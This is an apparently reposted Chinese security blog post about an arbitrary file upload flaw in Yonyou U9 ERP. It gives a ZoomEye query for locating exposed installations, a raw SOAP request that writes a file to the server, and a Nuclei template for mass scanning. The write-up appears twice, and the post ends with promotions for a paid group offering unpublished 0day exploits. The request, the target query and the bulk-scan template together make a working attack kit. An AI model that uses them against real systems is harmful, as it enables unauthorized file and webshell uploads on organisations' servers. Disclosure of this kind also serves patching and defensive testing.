用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

0x01 产品简介

   用友系统-U9 cloud是基于最新应用平台，全新系统架构及开发技术，适配安可要求，融合生态发展，开放标准数据服务接口，并与用友系统-U9 cloud系列产品无缝融合应用，打造场景化、数据化工作驱动的全新产品。这里我推荐利用 **Zo**omEye****搜索引擎直接输入关键字即可，影响资产9000+。

声明

请自行搭建环境进行漏洞测试，该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为，如用于其他用途，由使用者承担全部法律及连带责任，与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

    文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统，而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制，可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件。

0x03 ZoomEye语法

app:"用友 U9"

0x04 漏洞复现

POC

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1``Host: {}``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate, br``Accept-Language: zh-CN,zh;q=0.9``Cookie: .ASPXANONYMOUS=1OJZqnZ03AEkAAAAZGQ2ZDU0NzYtMDdiZS00YWJhLTk2ZTMtNmRhYTgxNDM5OTNi0; ASP.NET_SessionId=md4bw5fgleu1cxfdwk4w0o4n``Connection: close``Content-Type: text/xml; charset=utf-8``Content-Length: 433``   ``<?xml version="1.0" encoding="utf-8"?>``<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`  `<soap:Body>`    `<SaveFile xmlns="http://tempuri.org/">`      `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`      `<path>./</path>`      `<fileName>123.txt</fileName>`    `</SaveFile>`  `</soap:Body>``</soap:Envelope>

Nuclei批量检测POC（请自行搭建环境检测）

id: yonyou-U9-PatchFile-asmx-uploadfile``   ``info:`  `name: yonyou-U9-PatchFile-asmx-uploadfile`  `author: 渗透安全HackTwo`  `severity: high``   `  `description: |`    `漏洞测试-公众号-渗透安全HackTwo`  `reference:`    `- https://127.0.0.1`  `tags: auto``   ``variables:`  `filename: "{{to_lower(rand_base(10))}}"`  `boundary: "{{to_lower(rand_base(20))}}"``   ``http:`  `- raw:`      `- |`        `POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1`        `Host:{{Hostname}}`        `Accept-Encoding: gzip, deflate, br`        `Accept-Language: zh-CN,zh;q=0.9b`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`        `Content-Type: text/xml; charset=utf-8`        `Connection: close`        `        <?xml version="1.0" encoding="utf-8"?>`        `<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`          `<soap:Body>`            `<SaveFile xmlns="http://tempuri.org/">`              `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`              `<path>./</path>`              `<fileName>{{filename}}.txt</fileName>`            `</SaveFile>`          `</soap:Body>`        `</soap:Envelope>`        `   `      `- |`        `GET /CS/Office/AutoUpdates/{{filename}}.txt HTTP/1.1`        `Host: {{Hostname}}`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36``   `    `matchers:`      `- type: dsl`        `dsl:`          `- status_code==200 && contains_all(body,"Upload-successfully")

0x05 修复建议

升级至最新版本，官方已经推出新的版本补丁包。

0x06 内部福利介绍-更新啦！

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

一些漏洞报告200+(仅列举部分)加入星球获取更多资源及视频资源持续更新中！

    需要加入内部知识星球可点击下方链接，资源包含但不限于网上未公开的day漏洞（更新漏洞POC共500+），2024最新企业SRC/CNVD/Edu实战挖掘技巧报告，红队内网横向渗透，代码审计，JS逆向，SRC培训等课程。圈子对新人友好，加入圈子拥有FOFA shadan 360Quake ZoomEye Tide 零零信安Hunter等等高级会员账号，SRC文档，武器库。**圈子里面资料价值至少在10K以上，目前星球内部主题400+，资源2000+，其他和网盘资源1w+并持续更新中，越早加入价格越低**。(详情点击下方地址了解-->>还是觉得价格贵的师傅后台回复" **星球** "有优惠券使用名额有限先到先得)

结尾

免责声明

获取方法

回复“app" 获取 app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理，收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

压缩包解压密码：HackTwo

免责声明

  文章中的案例或工具仅面向合法授权的企业安全建设行为，如您需要测试内容的可用性，请自行搭建靶机环境，勿用于非法行为。如用于其他用途，由使用者承担全部法律及连带责任，与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断，不存在漏洞利用过程，不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。本工具或文章或来源于网络，若有侵权请联系作者删除，请在24小时内删除，请勿用于商业行为，自行查验是否具有后门，切勿相信软件内的广告！

---

喜欢的朋友可以点赞转发支持一下

本文转自 https://mp.weixin.qq.com/s/yRgOKGLuBCxpZz1nCBuzEQ，如有侵权，请联系删除。0x01 产品简介

   用友系统-U9 cloud是基于最新应用平台，全新系统架构及开发技术，适配安可要求，融合生态发展，开放标准数据服务接口，并与用友系统-U9 cloud系列产品无缝融合应用，打造场景化、数据化工作驱动的全新产品。这里我推荐利用 **Zo**omEye****搜索引擎直接输入关键字即可，影响资产9000+。

声明

请自行搭建环境进行漏洞测试，该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为，如用于其他用途，由使用者承担全部法律及连带责任，与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

    文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统，而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制，可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件。

0x03 ZoomEye语法

app:"用友 U9"

0x04 漏洞复现

POC

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1``Host: {}``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate, br``Accept-Language: zh-CN,zh;q=0.9``Cookie: .ASPXANONYMOUS=1OJZqnZ03AEkAAAAZGQ2ZDU0NzYtMDdiZS00YWJhLTk2ZTMtNmRhYTgxNDM5OTNi0; ASP.NET_SessionId=md4bw5fgleu1cxfdwk4w0o4n``Connection: close``Content-Type: text/xml; charset=utf-8``Content-Length: 433``   ``<?xml version="1.0" encoding="utf-8"?>``<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`  `<soap:Body>`    `<SaveFile xmlns="http://tempuri.org/">`      `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`      `<path>./</path>`      `<fileName>123.txt</fileName>`    `</SaveFile>`  `</soap:Body>``</soap:Envelope>

Nuclei批量检测POC（请自行搭建环境检测）

id: yonyou-U9-PatchFile-asmx-uploadfile``   ``info:`  `name: yonyou-U9-PatchFile-asmx-uploadfile`  `author: 渗透安全HackTwo`  `severity: high``   `  `description: |`    `漏洞测试-公众号-渗透安全HackTwo`  `reference:`    `- https://127.0.0.1`  `tags: auto``   ``variables:`  `filename: "{{to_lower(rand_base(10))}}"`  `boundary: "{{to_lower(rand_base(20))}}"``   ``http:`  `- raw:`      `- |`        `POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1`        `Host:{{Hostname}}`        `Accept-Encoding: gzip, deflate, br`        `Accept-Language: zh-CN,zh;q=0.9b`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`        `Content-Type: text/xml; charset=utf-8`        `Connection: close`        `        <?xml version="1.0" encoding="utf-8"?>`        `<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`          `<soap:Body>`            `<SaveFile xmlns="http://tempuri.org/">`              `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`              `<path>./</path>`              `<fileName>{{filename}}.txt</fileName>`            `</SaveFile>`          `</soap:Body>`        `</soap:Envelope>`        `   `      `- |`        `GET /CS/Office/AutoUpdates/{{filename}}.txt HTTP/1.1`        `Host: {{Hostname}}`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36``   `    `matchers:`      `- type: dsl`        `dsl:`          `- status_code==200 && contains_all(body,"Upload-successfully")

0x05 修复建议

升级至最新版本，官方已经推出新的版本补丁包。

0x06 内部福利介绍-更新啦！

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+需要的加入星球获取

一些漏洞报告200+(仅列举部分)加入星球获取更多资源及视频资源持续更新中！

题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

• 2023届全国高校毕业生预计达到1158万人，就业形势严峻；

• 国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

“没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才 需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取